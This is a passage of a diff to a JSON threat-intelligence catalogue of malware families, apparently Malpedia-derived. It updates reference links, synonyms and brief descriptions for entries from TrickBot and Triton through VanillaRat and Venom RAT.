"https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", + "https://public.intel471.com/blog/partners-in-crime-north-koreans-and-elite-russian-speaking-cybercriminals/", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", "https://www.youtube.com/watch?v=EdchPEHnohw", - "https://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html", - "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html", - "https://www.vkremez.com/2018/11/lets-learn-introducing-latest-trickbot.html", - "https://www.youtube.com/watch?v=lTywPmZEU1A", - "https://qmemcpy.github.io/post/reverse-engineering-malware-trickbot-part-1-packer", - "https://www.botconf.eu/wp-content/uploads/2016/11/2016-LT09-TrickBot-Adams.pdf", - "https://www.flashpoint-intel.com/blog/new-version-trickbot-adds-worm-propagation-module/" + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html", + "https://redcanary.com/resources/webinars/deep-dive-process-injection/", + "https://www.bleepingcomputer.com/news/security/malware-tries-to-trump-security-software-with-potus-impeachment/", + "https://unit42.paloaltonetworks.com/trickbot-campaign-uses-fake-payroll-emails-to-conduct-phishing-attacks/", + "https://osint.fans/service-nsw-russia-association" ], "synonyms": [ "TheTrick", @@ -16968,12 +30948,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.triton", + "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html", + "https://www.eenews.net/stories/1060123327/", "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware", - "https://dragos.com/blog/trisis/TRISIS-01.pdf", + "https://home.treasury.gov/news/press-releases/sm1162", + "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%E2%80%94Safety%20System%20Targeted%20Malware_S508C.pdf", "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html", "https://github.com/ICSrepo/TRISIS-TRITON-HATMAN", - "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html", - "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%E2%80%94Safety%20System%20Targeted%20Malware_S508C.pdf" + "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", + "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1538425180.pdf", + "https://securelist.com/apt-trends-report-q2-2019/91897/", + "https://dragos.com/blog/trisis/TRISIS-01.pdf", + "https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security" ], "synonyms": [ "HatMan", @@ -16990,9 +30976,15 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.trochilus_rat", "https://github.com/5loyd/trochilus/", - "https://asert.arbornetworks.com/uncovering-the-seven-pointed-dagger/", - "https://github.com/m0n0ph1/malware-1/tree/master/Trochilus", - "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf" + "https://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf", + "https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf", + "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn", + "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia", + "https://www.secureworks.com/research/bronze-vinewood-targets-supply-chains", + "https://www.secureworks.com/research/threat-profiles/bronze-vinewood", + "https://github.com/m0n0ph1/malware-1/tree/master/Trochilus" ], "synonyms": [], "type": [] @@ -17006,10 +30998,16 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.troldesh", "https://securelist.com/the-shade-encryptor-a-double-threat/72087/", - "https://www.welivesecurity.com/2019/01/28/russia-hit-new-wave-ransomware-spam/", + "https://support.kaspersky.com/13059", + "https://blog.avast.com/ransomware-strain-troldesh-spikes", + "https://github.com/shade-team/keys", "https://isc.sans.edu/forums/diary/More+Russian+language+malspam+pushing+Shade+Troldesh+ransomware/24668/", + "https://unit42.paloaltonetworks.com/shade-ransomware-hits-high-tech-wholesale-education-sectors-in-u-s-japan-india-thailand-canada/", + "https://www.zdnet.com/article/shade-troldesh-ransomware-shuts-down-and-releases-all-decryption-keys/", + "https://blog.checkpoint.com/2015/06/01/troldesh-new-ransomware-from-russia/", "https://blogs.technet.microsoft.com/mmpc/2016/07/13/troldesh-ransomware-influenced-by-the-da-vinci-code/", - "https://support.kaspersky.com/13059" + "https://www.welivesecurity.com/2019/01/28/russia-hit-new-wave-ransomware-spam/", + "https://labs.bitdefender.com/2020/05/shade-troldesh-ransomware-decryption-tool/" ], "synonyms": [ "Shade" @@ -17019,6 +31017,32 @@ "uuid": "41acd50d-e602-41a9-85e7-c091fb4bc126", "value": "Troldesh" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.troublegrabber", + "https://www.netskope.com/blog/here-comes-troublegrabber-stealing-credentials-through-discord" + ], + "synonyms": [], + "type": [] + }, + "uuid": "183fa14a-f42a-4508-b146-8550ba1acf2a", + "value": "TroubleGrabber" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.troystealer", + "https://seguranca-informatica.pt/troystealer-a-new-info-stealer-targeting-portuguese-internet-users" + ], + "synonyms": [], + "type": [] + }, + "uuid": "36d7dea1-6abf-41ea-bcd8-079f24dc0972", + "value": "troystealer" + }, { "description": "", "meta": { @@ -17047,22 +31071,79 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.turnedup", - "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", - "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.turla_rpc", + "https://unit42.paloaltonetworks.com/ironnetinjector/", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity", + "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/" ], "synonyms": [], "type": [] }, + "uuid": "8c6248d2-2b3a-4fe8-99cd-552077e3f84f", + "value": "TurlaRPC" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.turla_silentmoon", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://twitter.com/Arkbird_SOLG/status/1304187749373800455", + "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity" + ], + "synonyms": [ + "GoldenSky", + "HyperStack" + ], + "type": [] + }, + "uuid": "ddee7f00-66e0-4d89-bd51-4b0df516a248", + "value": "Turla SilentMoon" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.turnedup", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.cyberbit.com/new-early-bird-code-injection-technique-discovered/", + "https://www.cyberbit.com/blog/endpoint-security/new-early-bird-code-injection-technique-discovered/", + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" + ], + "synonyms": [ + "Notestuk" + ], + "type": [] + }, "uuid": "fab34d66-5668-460a-bc0f-250b9417cdbf", "value": "TURNEDUP" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.typehash", + "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf", + "https://vblocalhost.com/uploads/VB2020-Lunghi-Horejsi.pdf" + ], + "synonyms": [ + "SkinnyD" + ], + "type": [] + }, + "uuid": "d7b0ccc8-051c-4ab1-908e-3bd1811d9e2e", + "value": "TypeHash" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tyupkin", - "https://www.lastline.com/labsblog/tyupkin-atm-malware/" + "https://www.lastline.com/labsblog/tyupkin-atm-malware/", + "https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf", + "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html" ], "synonyms": [], "type": [] @@ -17070,11 +31151,25 @@ "uuid": "c28e9055-b656-4b7a-aa91-fe478a83fe4c", "value": "Tyupkin" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.t_rat", + "https://www.gdatasoftware.com/blog/trat-control-via-smartphone" + ], + "synonyms": [], + "type": [] + }, + "uuid": "fb9e9ade-b154-43ba-a0ea-550322454acf", + "value": "T-RAT 2.0" + }, { "description": "A toolkit maintained by hfiref0x which incorporates numerous UAC bypass techniques for Windows 7 - Windows 10. Typically, components of this tool are stripped out and reused by malicious actors.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.uacme", + "https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/", "https://github.com/hfiref0x/UACME" ], "synonyms": [ @@ -17091,7 +31186,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.udpos", "https://threatmatrix.cylance.com/en_us/home/threat-spotlight-inside-udpos-malware.html", - "https://blogs.forcepoint.com/security-labs/udpos-exfiltrating-credit-card-data-dns" + "https://www.forcepoint.com/blog/x-labs/udpos-exfiltrating-credit-card-data-dns" ], "synonyms": [], "type": [] @@ -17152,18 +31247,6 @@ "uuid": "0e435b5d-37df-47cc-a1c4-1afb82df83d1", "value": "Unidentified 003" }, - { - "description": "", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_005" - ], - "synonyms": [], - "type": [] - }, - "uuid": "29e32ea9-8e10-4c50-a4dc-1642066a3df2", - "value": "win.unidentified_005" - }, { "description": "", "meta": { @@ -17301,31 +31384,6 @@ "uuid": "122c1c9c-3131-4014-856c-7e8a0da57a6e", "value": "Unidentified 031" }, - { - "description": "", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_032", - "https://researchcenter.paloaltonetworks.com/2017/08/unit42-blockbuster-saga-continues/" - ], - "synonyms": [], - "type": [] - }, - "uuid": "799921d7-48e8-47a6-989e-487b527af37a", - "value": "Unidentified 032" - }, - { - "description": "", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_035" - ], - "synonyms": [], - "type": [] - }, - "uuid": "ba014661-d1d4-4a69-a698-9f4120de9260", - "value": "Unidentified 035" - }, { "description": "", "meta": { @@ -17424,32 +31482,6 @@ "uuid": "18da6a0e-abe9-4f65-91a3-2bf5a5ad29c2", "value": "Unidentified 047" }, - { - "description": "", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_049", - "https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/" - ], - "synonyms": [], - "type": [] - }, - "uuid": "abd22cec-49ee-431f-a2e6-e4722b3e44bb", - "value": "Unidentified 049 (Lazarus/RAT)" - }, - { - "description": "", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_051", - "https://twitter.com/CDA/status/1014144988454772736" - ], - "synonyms": [], - "type": [] - }, - "uuid": "b614f291-dbf8-49ed-b110-b69ab6e8c6e5", - "value": "Unidentified 051" - }, { "description": "", "meta": { @@ -17466,8 +31498,7 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_053", - "https://labsblog.f-secure.com/2015/11/24/wonknu-a-spy-for-the-3rd-asean-us-summit/" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_053" ], "synonyms": [], "type": [] @@ -17475,20 +31506,6 @@ "uuid": "b60e32bd-158a-42b9-ac21-288bca4c8233", "value": "Unidentified 053 (Wonknu?)" }, - { - "description": "Unnamed downloader for win.wscspl as described in the 360ti blog post.", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_055", - "https://www.freebuf.com/articles/database/192726.html", - "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english" - ], - "synonyms": [], - "type": [] - }, - "uuid": "b001ebb7-5d33-4972-96cc-56f9549dff27", - "value": "Unidentified 055" - }, { "description": "Unnamed portscanner as used in the Australian Parliament Hack (Feb 2019).", "meta": { @@ -17516,6 +31533,228 @@ "uuid": "bab52335-be9e-4fad-b68e-f124b0d69bbc", "value": "Unidentified 058" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_059" + ], + "synonyms": [], + "type": [] + }, + "uuid": "", + "value": "win.unidentified_059" + }, + { + "description": "Unidentified sideloader used by EmissaryPanda", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_060", + "https://norfolkinfosec.com/emissary-panda-dll-backdoor/", + "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "84f43641-77bc-4dcb-a104-150e8574da22", + "value": "Unidentified 060" + }, + { + "description": "Was previously wrongly tagged as PoweliksDropper, now looking for additional context.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_061" + ], + "synonyms": [], + "type": [] + }, + "uuid": "969d1054-b917-4fb8-b3f8-1e33926fdb65", + "value": "Unidentified 061" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_063", + "https://twitter.com/KevinPerlow/status/1160766519615381504" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d34ac949-3816-436b-a719-b4ced192388e", + "value": "Unidentified 063 (Lazarus Keylogger)" + }, + { + "description": "This .net executable can receive commands from c2 sever, upload and download files according to the returned content, perform an uninstall, or modify the registry to achieve persistence across reboots. At the end, it downloads a Python-based RAT, called PeppyRAT.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_066", + "https://s.tencent.com/research/report/669.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e78c402f-998b-43ff-8102-f54838afcb8b", + "value": "Unidentified 066" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_067", + "https://s.tencent.com/research/report/831.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "224066ee-4266-44a3-8ea2-b5d7b9b4969a", + "value": "Unidentified 067" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_068", + "https://rules.emergingthreatspro.com/changelogs/suricata-5.0-enhanced.etpro.2019-12-05T23:38:02.txt" + ], + "synonyms": [], + "type": [] + }, + "uuid": "26bfad72-59d8-456e-a200-eb18e614e5cb", + "value": "Unidentified 068" + }, + { + "description": "Zeus derivate, no known public references.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_069", + "https://zeusmuseum.com/unnamed%202/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "cc66d112-2ff5-462c-b029-15458d51f8a7", + "value": "Unidentified 069 (Zeus Unnamed2)" + }, + { + "description": "Unidentified downloader, possibly related to KONNI.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_070", + "https://twitter.com/M11Sec/status/1217781224204357633" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0bdef005-fd36-4ce0-a215-d49bf05b8fb8", + "value": "Unidentified 070 (Downloader)" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_071", + "https://zeusmuseum.com/unnamed%201/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "cc7de9da-dc33-4cf8-9388-986b001fad63", + "value": "Unidentified 071 (Zeus Unnamed1)" + }, + { + "description": "MSI-based loader that has been observed as a stager for win.metamorfo.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_072", + "https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/metamorfo.md" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f2979fee-603d-496e-a526-d622e9cba84f", + "value": "Unidentified 072 (Metamorfo Loader)" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_073", + "https://blog.certfa.com/posts/fake-interview-the-new-activity-of-charming-kitten/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f049e626-7de2-4648-81db-53dfd34f2fab", + "value": "Unidentified 073 (Charming Kitten)" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_074", + "https://blog.vincss.net/2019/12/re009-phan-tich-ma-doc-ke-hoach-nhiem-vu-trong-tam-2020.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4b60bda2-c587-4069-ace1-6283891d5faf", + "value": "Unidentified 074 (Downloader)" + }, + { + "description": "Unpacked http_dll.dat from the blog post.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_075", + "https://blog.vincss.net/2020/03/re012-phan-tich-ma-doc-loi-dung-dich-COVID-19-de-phat-tan-gia-mao-chi-thi-cua-thu-tuong-Nguyen-Xuan-Phuc.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "66f26a60-ab6a-4b7c-bd85-afdc44dbcfdd", + "value": "Unidentified 075" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_076", + "https://www.zscaler.com/blogs/research/return-higaisa-apt", + "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html", + "https://www.youtube.com/watch?v=8x-pGlWpIYI" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4d5d0798-9cb3-4f26-8c98-db8d7190d187", + "value": "Unidentified 076 (Higaisa LNK to Shellcode)" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_077", + "https://twitter.com/ccxsaber/status/1277064824434745345" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ca8a1900-ea9a-4d83-8873-6c48ac12da9a", + "value": "Unidentified 077 (Lazarus Downloader)" + }, + { + "description": "Suspected Zebrocy loader written in Nim.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_078", + "https://twitter.com/Vishnyak0v/status/1300704689865060353" + ], + "synonyms": [], + "type": [] + }, + "uuid": "99099489-eeb9-415a-a3b8-6133e774bed0", + "value": "Unidentified 078 (Zebrocy Nim Loader?)" + }, { "description": "", "meta": { @@ -17536,7 +31775,6 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.upas", "https://malware.dontneedcoffee.com/2012/08/inside-upas-kit1.0.1.1.html", - "https://twitter.com/ulexec/status/1005096227741020160", "https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/" ], "synonyms": [ @@ -17548,10 +31786,11 @@ "value": "UPAS" }, { - "description": "", + "description": "Upatre is primarly a downloader. It has been discovered in 2013 and since that time it has been widely updated. Upatre is responsible for delivering further malware to the victims, in specific upatre was a prolific delivery mechanism for Gameover P2P in 2013-2014 and then for Dyre in 2015.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.upatre", + "https://marcoramilli.com/2020/06/24/is-upatre-downloader-coming-back/", "https://johannesbader.ch/2015/06/Win32-Upatre-BI-Part-1-Unpacking/", "https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/", "https://secrary.com/ReversingMalware/Upatre/" @@ -17581,14 +31820,15 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.urlzone", "https://www.gdatasoftware.com/blog/2013/12/23978-bebloh-a-well-known-banking-trojan-with-noteworthy-innovations", "https://www.johannesbader.ch/2015/01/the-dga-of-shiotob/", - "https://www.proofpoint.com/us/threat-insight/post/Vawtrak-UrlZone-Banking-Trojans-Target-Japan", + "https://krebsonsecurity.com/2011/07/trojan-tricks-victims-into-transfering-funds/", + "https://www.virusbulletin.com/virusbulletin/2012/09/urlzone-reloaded-new-evolution/", "https://www.fireeye.com/blog/threat-research/2016/01/urlzone_zones_inon.html", - "https://www.arbornetworks.com/blog/asert/an-update-on-the-urlzone-banker/", + "https://mp.weixin.qq.com/s/NRytT94ne5gKN31CSLq6GA", "https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features", "https://www.crowdstrike.com/blog/cutwail-spam-campaign-uses-steganography-to-distribute-urlzone/", - "https://www.virusbulletin.com/virusbulletin/2012/09/urlzone-reloaded-new-evolution/", + "https://www.proofpoint.com/us/threat-insight/post/Vawtrak-UrlZone-Banking-Trojans-Target-Japan", "http://blog.inquest.net/blog/2019/03/09/Analyzing-Sophisticated-PowerShell-Targeting-Japan/", - "https://krebsonsecurity.com/2011/07/trojan-tricks-victims-into-transfering-funds/" + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf" ], "synonyms": [ "Bebloh", @@ -17606,11 +31846,12 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.uroburos", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/", "https://www.gdatasoftware.com/blog/2014/05/23958-uroburos-rootkit-belgian-foreign-ministry-stricken", + "https://www.secureworks.com/research/threat-profiles/iron-hunter", "https://www.gdatasoftware.com/blog/2014/03/23966-uroburos-deeper-travel-into-kernel-protection-mitigation", "https://www.circl.lu/pub/tr-25/", "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified", - "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3193&sid=9fe4a57263c91a8b18bc43ae23afc453", "https://www.gdatasoftware.com/blog/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence", + "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf", "https://www.gdatasoftware.com/blog/2014/02/23968-uroburos-highly-complex-espionage-software-with-russian-roots", "https://www.gdatasoftware.com/blog/2014/06/23953-analysis-of-uroburos-using-windbg", "https://www.carbonblack.com/2017/08/18/threat-analysis-carbon-black-threat-research-dissects-png-dropper/" @@ -17623,6 +31864,101 @@ "uuid": "d674ffd2-1f27-403b-8fe9-b4af6e303e5c", "value": "Uroburos (Windows)" }, + { + "description": "According to Kaspersky, USBCulprit is a malware that is capable of scanning various paths in victim machines, collecting documents with particular extensions and passing them on to USB drives when they are connected to the system. It can also selectively copy itself to a removable drive in the presence of a particular file, suggesting it can be spread laterally by having designated drives infected and the executable in them opened manually.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.usbculprit", + "https://securelist.com/cycldek-bridging-the-air-gap/97157/", + "https://drive.google.com/file/d/11otA_VmL061KcFC5MhDYuNdIKHYbpyrd/view" + ], + "synonyms": [], + "type": [] + }, + "uuid": "56af8251-4236-42e0-99bc-2c32377e97bb", + "value": "USBCulprit" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.usbferry", + "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-troopers-back-usbferry-attack-targets-air-gapped-environments/", + "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6d0a92c0-cad8-4470-b780-3041774acad3", + "value": "USBferry" + }, + { + "description": "ESET reports that Vadokrist is a Latin American banking trojan that they have been tracking since 2018 and that is active almost exclusively in Brazil.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vadokrist", + "https://www.welivesecurity.com/2021/01/21/vadokrist-wolf-sheeps-clothing/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d4ab5619-2347-4949-8102-78296b87a08c", + "value": "Vadokrist" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vaggen", + "https://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "006621d1-a3bd-40f2-a55c-d79c84879a6b", + "value": "Vaggen" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.valuevault", + "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html", + "https://intezer.com/blog-new-iranian-campaign-tailored-to-us-companies-uses-updated-toolset/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "dd95eefd-2ef3-4bda-9065-18f4b03c2249", + "value": "VALUEVAULT" + }, + { + "description": "Description:\r\n\r\nVanillaRat is an advanced remote administration tool coded in C#. VanillaRat uses the Telepathy TCP networking library, dnlib module reading and writing library, and Costura.Fody dll embedding library.\r\nFeatures:\r\n\r\n Remote Desktop Viewer (With remote click)\r\n File Browser (Including downloading, drag and drop uploading, and file opening)\r\n Process Manager\r\n Computer Information\r\n Hardware Usage Information (CPU usage, disk usage, available ram)\r\n Message Box Sender\r\n Text To Speech\r\n Screen Locker\r\n Live Keylogger (Also shows current window)\r\n Website Opener\r\n Application Permission Raiser (Normal -> Admin)\r\n Clipboard Text (Copied text)\r\n Chat (Does not allow for client to close form)\r\n Audio Recorder (Microphone)\r\n Process Killer (Task manager, etc.)\r\n Remote Shell\r\n Startup\r\n Security Blacklist (Drag client into list if you don't want connection. Press del. key on client to remove from list)\r\n", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vanillarat", + "https://github.com/DannyTheSloth/VanillaRAT" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5bb80b4a-d304-460a-bb07-417dea64f213", + "value": "vanillarat" + }, + { + "description": "In May 2019, ESET researchers observed a spike in ESET telemetry data regarding malware targeting France. After further investigations, they identified malware that distributes various types of spam. One of them is leading to a survey that redirects to a dodgy smartphone promotion while the other is a sextortion campaign. The spam targets the users of Orange S.A., a French ISP.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.varenyky", + "https://krebsonsecurity.com/2019/12/nuclear-bot-author-arrested-in-sextortion-case/", + "https://www.welivesecurity.com/2019/08/08/varenyky-spambot-campaigns-france/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f0740430-248f-4dd9-a2f3-b2592090a8a6", + "value": "Varenyky" + }, { "description": "", "meta": { @@ -17651,9 +31987,12 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vegalocker", "https://twitter.com/malwrhunterteam/status/1095024267459284992", - "https://twitter.com/malwrhunterteam/status/1093136163836174339" + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/buran-ransomware-the-evolution-of-vegalocker/", + "https://twitter.com/malwrhunterteam/status/1093136163836174339", + "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618" ], "synonyms": [ + "Buran", "Vega" ], "type": [] @@ -17674,6 +32013,35 @@ "uuid": "5490d2c7-72db-42cf-a1a4-02be1b3ade5f", "value": "Velso Ransomware" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.venom", + "https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html", + "https://www.cybeseclabs.com/2020/05/07/venom-remote-administration-tool-from-venom-software/", + "https://blog.malwarelab.pl/posts/venom/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "2ce1f55e-ac43-4fcb-b647-ff5ae9c26b7c", + "value": "Venom RAT" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.venom_lnk", + "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/", + "https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9" + ], + "synonyms": [], + "type": [] + }, + "uuid": "dea1ff4f-bc6d-40c0-9d19-b60578ea1344", + "value": "VenomLNK" + }, { "description": "", "meta": { @@ -17715,13 +32083,31 @@ "uuid": "044849d3-d0de-4f78-b67d-bfbe8dd3a255", "value": "Vflooder" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vhd_ransomware", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/", + "https://twitter.com/GrujaRS/status/1241657443282825217" + ], + "synonyms": [], + "type": [] + }, + "uuid": 